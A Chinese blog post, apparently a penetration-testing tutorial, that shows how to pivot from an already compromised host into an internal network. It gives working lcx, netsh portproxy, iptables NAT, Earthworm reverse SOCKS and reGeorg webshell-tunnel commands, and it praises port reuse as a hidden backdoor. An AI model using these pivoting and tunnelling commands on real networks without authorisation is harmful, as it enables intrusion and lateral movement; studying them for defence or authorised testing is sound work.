当前位置:   article > 正文

内网渗透-内网穿透工具_python 自制内网穿透

python 自制内网穿透

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

内网穿透

想从外网渗透内网主机,但内网很多主机不直接连外网,所以要进行搭建通道
(前提是已经控制了一台主机,通过这台主机渗透其他内网主机

win端口转发:lcx.exe netsh
linux端口转发:portmap iptables
多平台:Earthworm
端口复用:reGeorg

lcx

win平台的一款老工具。
(好用是好用,就是被放进全家桶了)

//端口转发(listen和slave)
lcx.exe -listen 8080 8081 //监听两个端口
lcx.exe -slave 192.168.1.128 8080 192.168.1.131 8888 //连接128:8080端口时映射到131:8888端口
  • 1
  • 2
  • 3
//端口映射(tran)
lcx -tran 8888 127.0.0.1 3306 //把8088端口映射到3306端口
  • 1
  • 2

netsh

win平台内置的命令
运行cmd

//xp需要安装ipv6
netsh interface ipv6 install 
  • 1
  • 2

开启防火墙需要放行tcp端口

//设置一个规则v4tov4,访问192.168.1.132:6666端口会转发到192.168.1.128:3389端口
netsh interface portproxy set v4tov4 listenaddress=192.168.1.132 listenport=6666 connectaddress=192.168.1.128 connectport=3389
  • 1
  • 2

取消端口转发

netsh interface portproxy delete v4tov4 listenaddress=192.168.1.132 listenport=3389
  • 1

查看已有配置

netsh interface portproxy show v4tov4
netsh interface portproxy show all
  • 1
  • 2

iptables

linux的端口转发
开启内核转发

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -p
  • 1
  • 2

配置端口转发

//正向代理
//访问192.168.1.131:8888跳转到192.168.1.128:80

iptables -t nat -A PREROUTING --dst 192.168.1.131 -p tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING --dst 192.168.1.128 -p tcp --dport 80 -j SNAT --to-source 192.168.1.131
service iptables save && service iptables start //保存重启
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.1.128 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.1.131
  • 1
  • 2
//本机之间端口转发
iptables -t nat -A PREROUTING -p tcp --dport 8888 -j REDIRECT --to-ports 3389
service iptables save && service iptables start //保存重启
  • 1
  • 2
  • 3

Earthworm

代理和端口转发一身的多平台工具(win,linux,mac之间来回穿透)

//正向连接
ew_win32.exe -s ssocksd -l 8082 //直接变成socks5代理服务器
  • 1
  • 2
//反向连接
ew_win32.exe -s rcsocks -l 8081 -e 8082 //监听本机8082端口,等待内网主机连接,访问本机8081就能链接内网
ew_win32.exe -s rssocks -d 192.168.1.1 -e 8082 //内网主机转发到外网8082端口
  • 1
  • 2
  • 3

端口复用

一个端口运行多个应用
(适用于服务器只开放了80端口,就凑合一下一起从80端口进出数据)
(有很好的隐藏后门,不用再开通个端口)

reGeorg

Python2.7写的一款工具,结合Webshell从80端口进行传输。
支持多种语言
https://github.com/sensepost/reGeorg

python2 reGeorgSocksProxy.py -l <监听地址> -p <本地服务监听的端口> -u <Webshell地址>
python2 reGeorgSocksProxy.py -l 192.168.1.131 -p 9999 -u http://192.168.1.128/tunnel.nosocket.php
  • 1
  • 2

小结

搭建好以后,就可以通过浏览器添加代理,或用socks5工具等等配置全局代理啥的。

获取工具
可关注微信公众号:XG小刚
回复:内网穿透工具
在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/酷酷是懒虫/article/detail/941560
推荐阅读
相关标签
  

闽ICP备14008679号